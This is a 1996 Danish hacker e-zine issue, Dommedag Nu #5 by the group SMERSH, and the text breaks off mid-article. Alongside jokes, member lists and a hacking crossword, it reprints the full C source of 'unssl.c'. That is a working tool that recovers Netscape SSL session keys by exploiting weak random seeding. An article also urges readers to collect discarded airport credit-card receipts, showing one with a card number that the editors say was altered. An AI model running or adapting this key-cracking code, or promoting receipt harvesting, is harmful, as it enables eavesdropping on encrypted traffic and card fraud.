310200 Z JAN 1996 STARTEX غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غ غ غ غغغ غ غ غ غ غغ غ غ غغ غغ غ غغغغغغ غ غ غ غ غغغغغغ غ غغغغغغ غ غغغغغغ غ غغ غغ غ غ غغغغغغ غ غ غغ غغغغغ غغ غغ غ غ غغغغغغ غغ غغ غ غ غ غ غ غ غ غغ غغغ غغ غغ غ غ غغ غ غغغغغغ غ غ غغغ غ غ غغغغغ غ غغغ غغغغغغ غ غ غغ غ غ غغغ غ غ غغغ غ غ غغ غ غ غ غغ غ غغغ غ غ غغ غ غ غ غ غغغ غ غ غ غ غغ غ غ غ غ غغ غ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ D O M M E D A G N U # 5 Quis custodiet ipsos custodes? S† chockerende (i kvalitet), S† smagl›st (i indhold), Og uden et gram social samvittighed (yeps, det er os!), Kan man andet end at elske os? De 11 p† toppen: Eksklusiv skribent..... Saron KTAS h‘vneren.......... Clive Sharp L‘rlingen.............. Narkobagmanden Helten................. 99papa Kongen................. Darkman Negeren................ Leroy Arbejdsl›s SYSGUD...... Deja-vu Den flotte............. Bobby Ewing KTAS-keld.............. Doggman Den flinke............. *Krigeren Den onde............... Darkseed UAFD: Darkside Connection.... 45974344 Space Oddity........... 48796355 Alien Staircase........ 31575188 Plan-B.............Kommer snart! DDN/E-Post: d95322@rix01.lyngbyes.dk De sagde: "Hvad fanden skal vi ogs† bruge det til?? Vi kan jo ikke engang sidde i det!!" Sagt med lettere hysterisk stemme af Deja-vu, da han og Clive Sharp en torsdag aften stjal et KTAS telt i den indre by, og efter at havde l›bet de ca. 100 meter hen til bilen, s† fandt de ud af, at teltet (og nu ogs† Clive Sharp og Deja-vu) var smurt ind i mudder! [Han var IKKE glad -red]. "N†r jeg bliver fuld, s† l›ber jeg ofte n›gen rundt!" Sagt, dybt alvorligt, af Darkman til en LETTERE choc- keret Clive Sharp. [Clive Sharp har efterf›lgende holdt sig v‘k, n†r Darkman er fuld -red]. "Lidt paranoia er altid godt, men tror du ikke, at i overdriver bare lidt??" Sagt af en tydeligt p†virket Darkseed, efter at Deja-vu og Clive Sharp n‘gtede at validere en bruger, som havde svaret p† alle undtagen 2 sp›rgsm†l, p† PLAN-B. Grunden: "Han lugtede af "sikkerheds-ekspert", ingen andre har svaret p† s† mange sp›rgsm†l f›r". "NNEEEEEJJJJJ!!! DE FIK MIG!!!! SVIN!!!!" skreget af en presset Clive Sharp, der efter en h†rd arbejdsdag kom hjem til et brev fra Rigspolitiets Dataafdeling! Han troede selvf›lgeligt, at de (endelig) havde f†et noget snavs p† ham [hvad dog?? -red], s† han blev temmeligt overrasket (og temmelig flov) da han †bnede brevet, og fandt sit nye k›rekort. "Fuck! Jeg har ikke nok linier..... hmmm.... Jeg smutter lige ud og tr‘kker nogle flere fra boksen". Sagt i dybeste alvor af Leroy under en af SMERSH's mange night-sessions. De takker: Narcoid.....Formand for den eneste *OFFICIELLE* DDN fan-club. TorNado ............................Dine virusser spiller. Titan........................................Tak for hj‘lpen. VOS............................................Du er for sej. Yod........................................Du er lige s† sej. Stumpen............................Din klub/hal er for elite! Vangeliz...........................................Du styrer! Savage......................................Du er for l‘kker! Mr. Nobody.....................................Du m† ha' det! Cynic............................Sjovt at m›de dig p† TP '95. De anbefaler: A Better Tomorrow, Tricky, TETSUO II - Body hammer, The Killer, Once A Thief, Hard Boiled, Space Marine, Deathwing, Inquisitor, VLAD, COTNO, KMFDM, PLA, People Haters, Sarah Louise Young, Open Season, stkyst Hustlers, RAHOWA. De mener: "Vi arbejdede h†rdt, men hver gang det begyndte at fungere, blev nye planer om omorganisering iv‘rksat. Jeg l‘rte mig senere i livet at vi er tilb›jelige til at m›de hver ny situ- ation gennem omorganisering og jeg l‘rte ogs†, hvilken vid- underlig metode dette er til at skabe illusion om fremgang, mens det i virkeligheden for†rsager kaos, ineffektivitet og demoralisering". Citat fra romanen "Satirae" skrevet af Cajus Petronius, der d›de †r 66 e.kr. efter et liv som embedsmand hos den romerske kejser Nero [fundet i KTAS's affald af 99papa og Narkobagmanden]. Indholdsfortegnelse: 1. Indledning. 2. D†rlig tilf‘ldigheds-generator i den f›rste version af Netscape. 3. Hjernebl›dning hos Tele Danmark. 4. Dommedag Nu's lette krydsord. 5. Janek - hvad gik der galt i dit liv?! 6. DDNGVOBB - File-wipe. 7. Danmark Direkte Telekort. 8. Yitzhak-Rabin - en virus. 9. The Party '95 - hvad gik der galt? 10. Boghj›rnet, vi anmelder: Hackers. The Virus Creation Labs - A Journey Into The Underground. Information Warfare, Chaos on the Electronic Superhighway. 11. Nyheder fra den Danske presse: S†dan beskytter du dig mod HACKERE. [Rapport Classic]. Ung hacker arresteret. [ComputerWorld]. Ny virus skaber forvirring. [ComputerWorld]. Sikkerhed p† Internettet. [Jyllandsposten]. N†r politiet er med p† en lytter. [Jyllandsposten]. Krypto-politik til debat. [Politiken]. Hackernes betvinger. [Politiken]. Dixie - en hacker har talt. [Politiken]. Digitale infektioner. [Politiken]. Privatliv sikret p† Nettet. [Politiken]. Tal trygt i telefon. [MOBIL magasinet]. Et sp›rgsm†l om timing at opdage datakriminalitet. [ComputerWorld]. Forbrydelsens hovedvej. [Jyllandsposten]. Politiet sl†s med krypterede diske. [ComputerWorld]. Virus fra Internet i karant‘ne. [Politiken]. Den elektroniske akillesh‘l. [ComputerWorld]. H†rdere kurs mod hackere. [Berlingske Tidende]. Aflytning af hackere. [Politiken]. Angreb p† Nettet. [Politiken]. Minister afviser Dansk net-politi. [Politiken]. SMERSHDOMMEDAGNU#5SMERSH Indledning til Dommedag Nu #5 Af Clive Sharp Ja, s† er vi her igen. Det l‘nge ventede mummer af Dommedag Nu #5 er p† gaden! Og der er sket en del ting siden sidst. Pat Bateman har forladt os, da han syntes, at det er sjovere at tjene penge, og det kan man jo ikke ben‘gte. Men vi har ogs† f†et nogle nye medlemmer, de er: Darkman: Han tiggede mig i 3 m†neder, hvorefter han begyndte at bestikke mig, for at blive medlem. Normalt kan jeg ikke bestikkes, men da jeg s† Darkman ligge p† kn‘ med t†r- ere i ›jnene, blev jeg dybt r›rt, og han blev medlem. Nej seri›st, han er Danmarks 100% bedste H/P/V type, og vi er glade for at have ham med. Leroy: En rimeligt stabil all-round hacker/phreaker, der har styr p† sit liv. Doggman: Garanti: Indenfor « †r, er han den sejeste phreaker Europa nogensinde har set! Bobby Ewing: Endnu et medlem til vores h‘r af trashere. *Krigeren: Vores allesammens coder/copy slave. Ellers har der v‘ret rimeligt gang i den, her i lille Danmark. Hacking (generelt) og datasikkerhed har v‘ret meget oppe i medierne i den seneste tid, se bare p† antallet af artikler i dette nummer. L‘g is‘r m‘rke til den artikel der hedder: "H†rdere kurs mod hackere", da den er udtryk for en ny holdnings- ‘ndring hos vores retssystem. Det kunne g† hen og blive ubehageligt. Men ogs† p† filmside har hacker-temaet v‘ret oppe og vende et par gange i den seneste tid. F›rst kom Johnny Mnemonic som jeg syntes er en fed film. Den voldtager ganske vist novellen af William Gibson, men den er tro mod id‚en. S† kom The Net. Den s† vildt sej ud (og Sandra Bullock er ganske flot), s† jeg stormede ind og s† den. At sige at jeg blev skuffet er en enorm underdrivelse. Jeg har sj‘ldent set s†dan en gang lort. Det minder mest om hvordan verden ser ud om 10 †r, HVIS Bill Gates blev pr‘sident. ALT i den film er grafisk-bruger- flade, og temmeligt urealistisk. Den er RINGE. S† kom Hackers, og hvis jeg tro- ede at The Net var d†rlig, s† gik jeg i bagl†s da jeg s† Hackers. Den er dob- belt s† ringe som The Net, og det siger en del! Den var s† ringe, at jeg flov- ede mig over at v‘re hacker, og det skal der ellers en del til. Bare for at s‘tte tingene i perspektiv, s† benyttede TV2's julekalende (d. 24) sig ogs† af hacking, og det var mere teknisk korrekt end Hackers og The Net, tilsammen! Tag den Hollywood! Denne gang har vi lidt mere kode med, og det er (ellers stik imod vores principper) skrevet p† engelsk. Grunden hertil er, at andre end lige Danskere kan have nytte af den (koden), og desuden er der en del tekniske udtryk som ikke er s† nemme at overs‘tte til Dansk, og s† stadig bibeholde meningen i tek- sten. Ellers s† gl‘der det mig, at vi i den seneste tid har f†et en masse nye hackere p† den Danske scene. Alle er ikke lige gode, men tendensen g†r i den rigtige retning, og inden l‘nge er vi nok oppe p† '91-93 niveau (ihvertfald i antal, hvis ikke i kvalitet). Hvis man har gang i nogle systemer, og sidder fast, s† er Darkside Connection altid et godt sted, hvor man kan f† kvalifi- ceret hj‘lp. Og det er ligemeget hvor trivielle ens problemer er. Men det smerter mig, at se folk som Janek, som tror at de er hackere, men det er de bare IKKE. Undg† at lave samme fejl som dem! Se den relaterede artikel i dette nummer af Dommedag Nu! Ja, der kommer flere numre af Dommedag Nu, selvom jeg skrev noget andet i Dommedag Nu #4. N‘ste nummer vil prim‘rt omhandle UNIX-hacking, TCP/IP og aktuelle sikkerhedshuller. Vi havde h†bet p†, at UNIX artiklen var f‘rdig til dette nummer, men s†dan skulle det nu ikke g†. Vi mangler stadig artikler, s† hvis du sidder og ved noget, som du mener har relevans til Hacking/Phreaking/ Virus scenen, s† skriv en artikel og upload den p† Darkside Connection. Og nej, Anarchy har INGEN interesse! Derudover g†r vi med planer om at f† Plan-B op at k›re igen, og vi reg- ner med, at det bliver engang i starten af Marts. Det er selvf›lgeligt afh‘ng- igt af, hvorn†r Deja-vu f†r fingeren ud, og scorer sig en linie. SMERSHDOMMEDAGNU#5SMERSH D†rlig tilf‘ldigheds-generator i den f›rste version af Netscape Af Darkman For at f›lge op p† artiklen i Dommedag Nu 4: "Sikkerhedshul i Netscape" af Pia Lykke Andersen, bringer vi nu source koden til et program, der kan finde krypterings n›glen som Netscape laver. Sikkerhedshullet i Netscape er, at de input programmet Netscape bruger for at laver krypterings n›gler, er baseret p† systemets tid i sekunder og hundrededelssekunder, og nogle andre informationer fra systemmet. Alle disse input er ikke videre sv‘re at finde p† et andet system. Man kan finde disse input, eller nogle informationer som ligger t‘t op af de n›dvendige input og man kan derved beregne sig til de n›dvendige input, ved at etablerer kontakt til nogle af det p†g‘ldende systems port. Da Netscape ikke nulstiller krypterings n›glen, hver gang der bliver etableret ny kontakt, men derimod laver en ny krypterings n›gle med kun den gamle krypterings n›gle som input, g›r det ikke den omtalte process sv‘re, da vi kun beh›ver at finde den f›rste krypterings n›gle, og n†r den er fundet, er det intet problem at beregne de fremtidige krypterings n›gle. Foruden bruger nogle platforme af Netscape en 40-bit kryptering n›gle og ingen af Netscape's plateforme bruger en st›rre krypterings n›gle en 128-bit og det er blevet offentliggjort at man har brudt en 512-bit krypterings n›gle. Men alt dette er meget nemmere at forst† ved at kigge p† source koden. Source koden er ikke udviklet af Darkman. /* unssl.c - Last update: 950917 Break netscape's shoddy implementation of SSL on some platforms (tested for netscape running RC4-40 on Solaris and HP-UX; other Unices are probably similar; other crypt methods are unknown, but it is likely that RC4-128 will have the same problems). The idea is this: netscape seeds the random number generator it uses to produce challenge-data and master keys with a combination of the time in seconds and microseconds, the pid and the ppid. Of these, only the microseconds is hard to determine by someone who (a) can watch your packets on the network and (b) has access to any account on the system running netscape. Even if (b) is not satisfied, the time can often be obtained from the time or daytime network daemons; an approximation to the pid can sometimes be obtained from a mail daemon (the pid is part of most Message-ID's); the ppid will usually be not much smaller than the pid, and has an higher than average chance of being 1. Clever guessing of these values will in all likelihood cut the expected search space down to less than brute-forcing a 40-bit key, and certainly is less than brute-forcing a 128-bit key. Subsequent https: connections after the first (even to different hosts) seem to _not_ reseed the RNG. This makes things much easier, once you've broken the first message. Just keep generating 16 bytes of random numbers until you get the challenge-data for the next message. The next key will then be the 16 random bytes after that. main() and bits of MD5Transform1 by Ian Goldberg <iang@cs.berkeley.edu> and David Wagner <daw@cs.berkeley.edu>. The rest is taken from the standard MD5 code; see below. This code seems to want to run on a big-endian machine. There may be other problems as well. This code is provided as-is; if it causes you to lose your data, sleep, civil liberties, or SO, that's your problem. #include <std/disclaimer.h> On the command line, give the time in seconds, the pid, the ppid and the SSL challenge data (each byte in hex, separated by some non-hex character like a colon) of the _first_ SSL message generated by the instance of netscape. This program will search through the microsecond values. You may need to run it again with a slightly different value for the seconds, depending on how accurately you know the time on the system running netscape. The output will be the master key (all 16 bytes; note you never even told the program the 11 bytes you knew) and the value for the microseconds that produced it. As a benchmark, this code runs in just under 25 seconds real time (for an unsuccessful search through 1<<20 values for the microseconds) on an unloaded HP 712/80. */ #include <stdio.h> #include <stdlib.h> /* I suppose parts of MD5Transform1 fall under: portions derived from RSA Data Security, Inc., MD5 message-digest algorithm Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All rights reserved. License to copy and use this software is granted provided that it is identified as the "RSA Data Security, Inc. MD5 Message-Digest Algorithm" in all material mentioning or referencing this software or this function. License is also granted to make and use derivative works provided that such works are identified as "derived from the RSA Data Security, Inc. MD5 Message-Digest Algorithm" in all material mentioning or referencing the derived work. RSA Data Security, Inc. makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this documentation and/or software. */ typedef unsigned int UINT4; /* Constants for MD5Transform routine. */ #define S11 7 #define S12 12 #define S13 17 #define S14 22 #define S21 5 #define S22 9 #define S23 14 #define S24 20 #define S31 4 #define S32 11 #define S33 16 #define S34 23 #define S41 6 #define S42 10 #define S43 15 #define S44 21 /* F, G, H and I are basic MD5 functions. */ #define F(x, y, z) (((x) & (y)) | ((~x) & (z))) #define G(x, y, z) (((x) & (z)) | ((y) & (~z))) #define H(x, y, z) ((x) ^ (y) ^ (z)) #define I(x, y, z) ((y) ^ ((x) | (~z))) /* ROTATE_LEFT rotates x left n bits. */ #define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n)))) /* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4. Rotation is separate from addition to prevent recomputation. */ #define FF(a, b, c, d, x, s, ac) { \ (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define GG(a, b, c, d, x, s, ac) { \ (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define HH(a, b, c, d, x, s, ac) { \ (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define II(a, b, c, d, x, s, ac) { \ (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } void MD5Transform1(unsigned char state[16], unsigned char block[64]) { UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d = 0x10325476, x[16]; unsigned int i,j; for (i = 0, j = 0; j < 64; i++, j += 4) x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) | (((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24); /* Round 1 */ FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */ FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */ FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */ FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */ FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */ FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */ FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */ FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */ FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */ FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */ FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */ FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */ FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */ FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */ FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */ FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */ /* Round 2 */ GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */ GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */ GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */ GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */ GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */ GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */ GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */ GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */ GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */ GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */ GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */ GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */ GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */ GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */ GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */ GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */ /* Round 3 */ HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */ HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */ HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */ HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */ HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */ HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */ HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */ HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */ HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */ HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */ HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */ HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */ HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */ HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */ HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */ HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */ /* Round 4 */ II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */ II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */ II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */ II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */ II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */ II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */ II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */ II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */ II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */ II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */ II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */ II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */ II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */ II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */ II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */ II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */ a += 0x67452301; b += 0xefcdab89; c += 0x98badcfe; d += 0x10325476; /* We need to swap endianness here */ state[0] = ((unsigned char *)&a)[3]; state[1] = ((unsigned char *)&a)[2]; state[2] = ((unsigned char *)&a)[1]; state[3] = ((unsigned char *)&a)[0]; state[4] = ((unsigned char *)&b)[3]; state[5] = ((unsigned char *)&b)[2]; state[6] = ((unsigned char *)&b)[1]; state[7] = ((unsigned char *)&b)[0]; state[8] = ((unsigned char *)&c)[3]; state[9] = ((unsigned char *)&c)[2]; state[10] = ((unsigned char *)&c)[1]; state[11] = ((unsigned char *)&c)[0]; state[12] = ((unsigned char *)&d)[3]; state[13] = ((unsigned char *)&d)[2]; state[14] = ((unsigned char *)&d)[1]; state[15] = ((unsigned char *)&d)[0]; } #define mklcpr(val) ((0xdeece66d*(val)+0x2bbb62dc)>>1) int main(int argc, char **argv) { int i; unsigned char maybe_challenge[16], true_challenge[16]; unsigned char key[16]; char *p; unsigned long sec, usec, pid, ppid; unsigned char eblock[64], cblock[64]; unsigned char *o1; int o2; if (argc == 5 && strlen(argv[4]) >= 47) { sec = strtol(argv[1], (char **) 0, 0); pid = strtol(argv[2], (char **) 0, 0); ppid = strtol(argv[3], (char **) 0, 0); p = argv[4]; for (i=0; i<16; i++) { true_challenge[i] = strtol(p, &p, 16); p++; } } else { printf("Usage: %s sec pid ppid " "00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n", argv[0]); exit(1); } /* Set up eblock and cblock */ for(i=0;i<64;++i) eblock[i]=0; eblock[8] = 0x80; eblock[56] = 0x40; for(i=0;i<64;++i) cblock[i]=0; cblock[16] = 0x80; cblock[56] = 0x80; ((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12)); for (usec=0; usec < (1<<20); usec++) { ((int *)eblock)[0] = mklcpr(usec); MD5Transform1(cblock, eblock); o2 = 0; o1 = &(cblock[0x0f]); do { if ((*o1)++) break; --o1; } while (++o2 <= 0x0f); o2 = 0; o1 = &(cblock[0x0f]); do { if ((*o1)++) break; --o1; } while (++o2 <= 0x0f); MD5Transform1(maybe_challenge, cblock); if (memcmp(maybe_challenge, true_challenge, 0x10) == 0) { printf("Found it! The key is "); o2 = 0; o1 = &(cblock[0x0f]); do { if ((*o1)++) break; --o1; } while (++o2 <= 0x0f); MD5Transform1(key, cblock); for (i=0; i<0x10; i++) printf("%2.2X ", (unsigned char) key[i]); printf("\n"); printf("usec = %lu\n", usec); exit(0); } } printf("Not found.\n"); exit(1); } SMERSHDOMMEDAGNU#5SMERSH Hjernebl›dning hos Tele Danmark Af Clive Sharp Undertegnede har, siden sidste nummer af Dommedag Nu, v‘ret en tur i USA. Og ja, allerede i lufthavnen, gik det op for mig, hvor ringe Tele Danmark egentlig er. Her er, hvad jeg fandt, i de specielle kreditkort-telefoner: ** COPENHAGEN AIRPORT ** 0 Telefonens l›be nr.: 3589 Dato : 05-09-95 Tid : 05:10 Kort nr. : 4512345678912345 Gyldigt til og med : 11-95 Kaldt nr. : 004545974344 Opkaldets art : PHONE Varighed : 0000'51" Pris : 00015.25 DKK ***** Tele Danmark **** Har de folk INTET l‘rt, selv ikke efter at b†de ComputerWorld, TV 2 og DR, har haft historier om folk, der har misbrugt AT&T med kortnumre der var fundet i Brugsen og andre steder. Dette er i mine ›jne v‘rre, fordi her kan man se, hvor folk har ringet hen. P† mindre end 20 min., havde jeg 13 af disse kviteringer, s† n‘ste gang du er i lufthavnen, check det ud! [Alle numre er ‘ndret -red]. SMERSHDOMMEDAGNU#5SMERSH Dommedag Nu's lette krydsord Af Clive Sharp og Darkman Ja, s† har Dommedag nu gjort det igen! Vi vender st‘rkt tilbage med lidt underholdning til de lange vinteraftner. Men dette er ikke bare for din forn›jelse. Dette er en konkurrence! Den f›rste der indsender dette krydsord til Dommedag Nu, har vundet en tur i byen med SMERSH, alt betalt! S† bare g† igang drenge. 1حححرححح5حححرحححرحححرححح7حححرحححرححح30ححرحححرححح9حححرحححرححح21ححرحححرححح19حح» ؛ ³ ³ ³ ³ ³ ³ ³ ³ غ ³ ³ ³ ³ ³ ³ ³ ³ غ ³ غ ³ ؛ اؤؤؤإؤؤؤ6ؤؤؤإؤؤؤإؤؤؤإؤؤؤ16ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ15ؤؤإؤؤؤإؤؤؤ25ؤؤإؤؤؤإؤؤؤ¶ ؛ ³ غ ³ ³ ³ ³ غ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ غ ³ ؛ اؤؤؤإؤؤؤ8ؤؤؤإؤؤؤإؤؤؤ18ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ23ؤؤإؤؤؤ¶ ؛ ³ غ ³ ³ ³ غ ³ ³ ³ ³ غ ³ غ ³ غ ³ غ ³ ³ ³ غ ³ ³ ³ ³ ؛ اؤؤؤ11ؤؤإؤؤؤإؤؤؤ10ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ27ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶ ؛ ³ ³ غ ³ غ ³ ³ ³ ³ ³ ³ ³ غ ³ غ ³ ³ ³ ³ ³ ³ ³ ؛ اؤؤؤإؤؤؤإؤؤؤإؤؤؤ12ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶ ؛ ³ ³ غ ³ غ ³ ³ ³ ³ ³ ³ ³ غ ³ غ ³ ³ ³ ³ ³ ³ ³ ؛ 2ؤؤؤإؤؤؤ13ؤؤإؤؤؤ14ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶ ؛ ³ ³ ³ غ ³ ³ ³ ³ ³ ³ ³ غ ³ غ ³ ³ ³ ³ ³ غ ³ ³ ؛ اؤؤؤإؤؤؤإؤؤؤإؤؤؤ22ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ32ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶ ؛ غ ³ غ ³ ³ غ ³ ³ ³ ³ ³ غ ³ ³ ³ ³ غ ³ ³ غ ³ غ ³ غ ³ غ ³ ؛ 3ؤؤؤ17ؤؤإؤؤؤإؤؤؤ20ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ28ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶ ؛ ³ ³ ³ غ ³ ³ ³ ³ ³ ³ غ ³ غ ³ ³ ³ ³ ³ ³ ³ ³ غ ؛ اؤؤؤإؤؤؤإؤؤؤ24ؤؤإؤؤؤإؤؤؤإؤؤؤ38ؤؤإؤؤؤإؤؤؤإؤؤؤ34ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶ ؛ ³ ³ غ ³ ³ ³ ³ غ ³ ³ ³ ³ غ ³ ³ ³ ³ ³ ³ ³ غ ³ غ ؛ 4ؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ26ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ36ؤؤإؤؤؤإؤؤؤإؤؤؤ¶ ؛ ³ ³ ³ ³ ³ ³ ³ غ ³ ³ ³ ³ ³ ³ غ ³ غ ³ ³ ³ ³ ؛ بحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدححح¼ Horisontal: 1) Hvilket UNIX utility er der fundet flest fejl i? 2) Hvilket output device er sk‘rmen? 4) Titlen p† en ny "hacker" film. 6) Hvis hans ___ er 0, s† er han root (eller noget p† samme niveau). 8) TCP/__. 10) En 3L!t3 gruppe (syntes de selv). 12) Han er kendt som "skoen". 14) Hvad er telnet port 79? 16) Hvem har lavet TREMOR og NEUROQUILA? 18) Hvad er telnet port 21? 20) Hvilket blad er lavet af TNO? 22) Hvilken enkrypterings-formel bruger SecureDrive blandt andet? 24) $___ /etc/passwd. 26) En virus der if›lge rygterne skulle v‘re lavet af John McAfee? 28) VLAD's Danske medlem. 30) En Ethernet_______. 32) Dark Avengers engine. 34) Et Svensk virus blad. ______ Reality. 36) Hvilket utility var f›r i tiden meget brugt, til at lave en "bagd›r"? 38) En ny hacker-film, The ___. Vertikal: 1) Et af de mest brugte password's. 3) Hvilken shell s‘tter man ofte i forbindelse med rlogin? 5) Hvad skal du bruge til Datapak? 7) NETTET? 9) Han har lavet COPS og SATAN. Han hedder Dan ______. 11) Hvad ligger p† 80010010? 13) Et program der ydnytter en fejl i NIS. 15) Hvilken "hacker"-film har Robert Redford v‘ret med i? 17) Hvad hedder den enkrypterings-metode som PGP benytter? 19) Han er en superhacker. Han hedder Kevin _______, ogs† kendt som Dark Dante. 21) Hvilken boks kan man lave ud af et Hallmark kort? 23) UNIX kommandoen ved Unix-til-Unix-kopiering. 25) Polymorphic engine af Rajaat. 27) ___, gruppen som blev beskyldt for at nedl‘gge AT&T. SMERSHDOMMEDAGNU#5SMERSH Janek - hvad gik der galt i dit liv?! Af Clive 